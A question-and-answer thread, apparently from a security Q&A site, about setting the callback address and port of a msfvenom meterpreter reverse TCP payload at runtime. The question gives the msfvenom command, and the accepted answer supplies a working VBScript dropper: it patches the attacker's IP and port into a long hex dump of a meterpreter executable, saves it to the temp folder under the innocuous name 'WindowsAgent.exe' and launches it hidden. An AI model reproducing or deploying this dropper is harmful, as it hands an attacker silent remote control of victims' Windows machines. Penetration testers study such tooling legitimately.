MSFvenom payload with dynamic options

Question

I am using MSFvenom to export meterpreter's reverse TCP payload. While this works with msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe, however I would like to specify the LHOST and LPORT in a dynamic fashion.

Ideally, I would pass in the arguments directly to the executable file. For example, in Command Prompt running shell_meterpreter.exe -LHOST 192.168.6.100 -LPORT 1111.

Does anyone know of a way to achieve this? I have tried looking into the source code but didn't find much luck there.

The source code of meterpreter is available freely; write a loader yourself. — Tobi Nary, Nov 17 '17 at 06:39

Hadoken · Answer 1 · 2017-11-17T07:26:09.540

1

msfvenom -p windows/x64/meterpreter/reverse_tcp **LHOST=192.168.x.x** LPORT=4444 -f -exe

You're using msfvenom here to generate code to attain a reverse shell on the target, you aren't passing the attacking machine's ip to it once it's generated or in your case, compiled as an executable if that makes sense.

edited Nov 17 '17 at 07:26

answered Nov 17 '17 at 06:58

Hadoken

53
2
7

I understand I am passing my IP address to MSvenom, I am trying to create a way to modify the input of that value on the fly. That way, if my IP address changes, I can quickly modify it. – Gavin Youker Nov 17 '17 at 07:01
You specified it as a port in your original post, but that' not what I'm getting at. I'm trying to say you can't pass this info to compiled code, you need to either find a different tool or create your own. – Hadoken Nov 17 '17 at 07:17
I see what you're saying now... nice catch. Just updated my question. – Gavin Youker Nov 17 '17 at 07:19
I'm not great at explaining this but imagine you create your own shell. The code you generated is literally a hardcoded address specifying your ip and port for where to send your shell, it's not dynamic. Metasploit allows you to set different options but once compiled it's set in stone, the only way to change it is recompile your code and place your new exploit on the machine with this new address and port. If you want to send your shell somewhere new on the fly, you would need to create your own payload and tools outside of msf because it's code would function and be extremely different. – Hadoken Nov 17 '17 at 07:47

score 0 · Accepted Answer · answered Nov 18 '17 at 05:43

I managed to find a solution that worked for me.

I found the variables for LPORT and LHOST in the executable's hex view (see screenshot).

If anyone is intested, I wrote a small VBS script that splices into that hex code.

Function BuildExe(Text) 
    ' Convert the string to hex.
    Set dom = CreateObject("Microsoft.XMLDOM")
    dom.loadXML("<TtB/>")
    dom.documentElement.nodeTypedValue = Text
    dom.documentElement.dataType = "bin.hex"
    exeHex = dom.documentElement.nodeTypedValue

    ' Create the filename and filepath for the executable.
    exeFile = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & CreateObject("Scripting.FileSystemObject").GetTempName()
    CreateObject("Scripting.FileSystemObject").CreateFolder(exeFile)
    exePath = exeFile & "\" & "WindowsAgent.exe"

    ' Compile and save the executbale.
    Set exeStream = CreateObject("ADODB.Stream")
    exeStream.Type = 1
    exeStream.Open
    exeStream.Write exeHex
    exeStream.SaveToFile exePath, 2

    ' Return the executable filepath.
    BuildExe = exePath
End Function

' Initialize the script.
Log "PAYLOAD", "Payload shell_meterpreter.vbs has been launched."
Execute("lib\includes\build_exe.vbs")

' Set the listener info in hex.
LPORT = Hex("4444")

octets = Split("192.168.6.131"), ".")
For i = 0 To UBound(octets)
    octectTemp = Hex(octets(i))
    If Len(octectTemp) = 1 Then
        octectTemp = 0 & octectTemp
    End If

    If i = 0 Then
        LHOST = octectTemp
    Else
        LHOST = LHOST & octectTemp
    End If
Next

' Build and run Meterpreter.
exePath = BuildExe("4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000C80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000392411DD7D457F8E7D457F8E7D457F8E5A83048E7E457F8E7D457E8E7F457F8E743DEA8E7C457F8E743DEE8E7C457F8E526963687D457F8E0000000000000000000000000000000050450000648603007D3CC64B0000000000000000F00023000B0201000030000000100000000000000040000000100000000000400100000000100000000200000400000000000000040000000000000078420000480200006C34000002000080000010000000000000100000000000000000100000000000001000000000000000000000100000000000000000000000004200006C000000000000000000000000000000000000000000000000000000704200000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000180000000000000000000000000000000000000000000000000000002E746578740000004E100000001000000012000000040000000000000000000000000000200000602E7264617461000084000000003000000002000000160000000000000000000000000000400000402E616F6C6500000078020000004000000004000000180000000000000000000000000000200000E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004883EC2849C7C14000000049C7C00030000048C7C2001000004833C9E82710000048C7C10010000048BE4110004001000000488BF8F3A4FFD04833C9E8011000005041594C4F41443A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CCFF25C00F0000FF25B20F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004030000000000000000000007630000000300000000000000000000000000000000000000000000066300000000000005830000000000000000000000000000005014578697450726F636573730058045669727475616C416C6C6F6300004B45524E454C33322E646C6C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FC4883E4F0E8CC000000415141505251564831D265488B5260488B5218488B5220488B7250480FB74A4A4D31C94831C0AC3C617C022C2041C1C90D4101C1E2ED524151488B52208B423C4801D0668178180B020F85720000008B80880000004885C074674801D0508B4818448B40204901D0E35648FFC9418B34884801D64D31C94831C0AC41C1C90D4101C138E075F14C034C24084539D175D858448B40244901D066418B0C48448B401C4901D0418B04884801D0415841585E595A41584159415A4883EC204152FFE05841595A488B12E94BFFFFFF5D49BE7773325F3332000041564989E64881ECA00100004989E549BC0200" & LPORT & LHOST & "41544989E44C89F141BA4C772607FFD54C89EA68010100005941BA29806B00FFD56A0A415E50504D31C94D31C048FFC04889C248FFC04889C141BAEA0FDFE0FFD54889C76A1041584C89E24889F941BA99A57461FFD585C0740A49FFCE75E5E8930000004883EC104889E24D31C96A0441584889F941BA02D9C85FFFD583F8007E554883C4205E89F66A404159680010000041584889F24831C941BA58A453E5FFD54889C34989C74D31C94989F04889DA4889F941BA02D9C85FFFD583F8007D2858415759680040000041586A005A41BA0B2F0F30FFD5575941BA756E4D61FFD549FFCEE93CFFFFFF4801C34829C64885F675B441FFE7586A005949C7C2F0B5A256FFD500002842000000000000FFFFFFFF404200000030000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004B45524E454C33322E646C6C000058045669727475616C416C6C6F63000005014578697450726F63657373000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WScript.CreateObject("WScript.Shell").Run "cmd.exe /C start /B cmd /C " & exePath, 0, True

MSFvenom payload with dynamic options

2 Answers2

Linked